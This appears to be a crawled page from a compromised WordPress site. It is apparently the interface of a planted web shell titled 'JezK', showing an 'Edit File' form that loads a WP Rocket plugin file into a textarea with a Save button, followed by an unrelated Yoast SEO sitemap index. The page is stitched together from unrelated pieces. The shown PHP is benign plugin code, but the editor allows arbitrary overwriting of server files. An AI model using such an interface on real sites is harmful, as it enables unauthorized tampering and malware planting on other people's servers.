
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: domain-mapping.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

defined( &#039;ABSPATH&#039; ) || exit;

/**
 * Used to get compatibility between multidomain and get_rocket_parse_url()
 *
 * @since 2.2
 *
 * @param string $url URL to modify.
 * @return string Modified URL
 */
function rocket_parse_url_domain_mapping( $url ) {
	$original_siteurl_host       = rocket_extract_url_component( get_original_url( &#039;siteurl&#039; ), PHP_URL_HOST );
	$domain_mapping_siteurl_host = rocket_extract_url_component( domain_mapping_siteurl( false ), PHP_URL_HOST );

	if ( false === strpos( $domain_mapping_siteurl_host, $original_siteurl_host ) ) {
		$url[&#039;host&#039;] = str_replace( $original_siteurl_host, $domain_mapping_siteurl_host, $url[&#039;host&#039;] );
	}

	return $url;
}
add_filter( &#039;rocket_parse_url&#039;, &#039;rocket_parse_url_domain_mapping&#039; );

/**
 * Used to get compatibility between multidomain and rocket_clean_files() &amp; rocket_clean_domain()
 *
 * @since 2.6.5 Add compatibility with rocket_clean_domain()
 * @since 2.2
 */
if ( function_exists( &#039;domain_mapping_post_content&#039; ) ) :
	add_filter( &#039;rocket_clean_files&#039;, &#039;domain_mapping_post_content&#039; );
	add_filter( &#039;rocket_clean_domain_urls&#039;, &#039;domain_mapping_post_content&#039; );
	add_filter( &#039;rocket_post_purge_urls&#039;, &#039;domain_mapping_post_content&#039; );
endif;

/**
 * Used to get compatibility between multidomain and rocket_clean_home()
 *
 * @since 2.6.5
 *
 * @param string $root Path to the cache for the host.
 * @param string $host Host value.
 * @param string $path Unused.
 * @return $root Path to the cache
 */
function rocket_clean_home_root_for_domain_mapping_siteurl( $root, $host, $path ) { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.FoundAfterLastUsed
	$original_siteurl_host       = rocket_extract_url_component( get_original_url( &#039;siteurl&#039; ), PHP_URL_HOST );
	$domain_mapping_siteurl_host = rocket_extract_url_component( domain_mapping_siteurl( false ), PHP_URL_HOST );

	if ( $original_siteurl_host !== $domain_mapping_siteurl_host ) {
		$root = WP_ROCKET_CACHE_PATH . $host . &#039;*&#039;;
	}

	return $root;
}
add_filter( &#039;rocket_clean_home_root&#039;, &#039;rocket_clean_home_root_for_domain_mapping_siteurl&#039;, 10, 3 );
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//drjoaopaulocostabraga.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/post-sitemap.xml</loc>
		<lastmod>2026-09-25T12:20:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/page-sitemap.xml</loc>
		<lastmod>2026-09-03T19:14:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/category-sitemap.xml</loc>
		<lastmod>2026-09-25T12:20:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/author-sitemap.xml</loc>
		<lastmod>2024-04-04T21:04:44+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->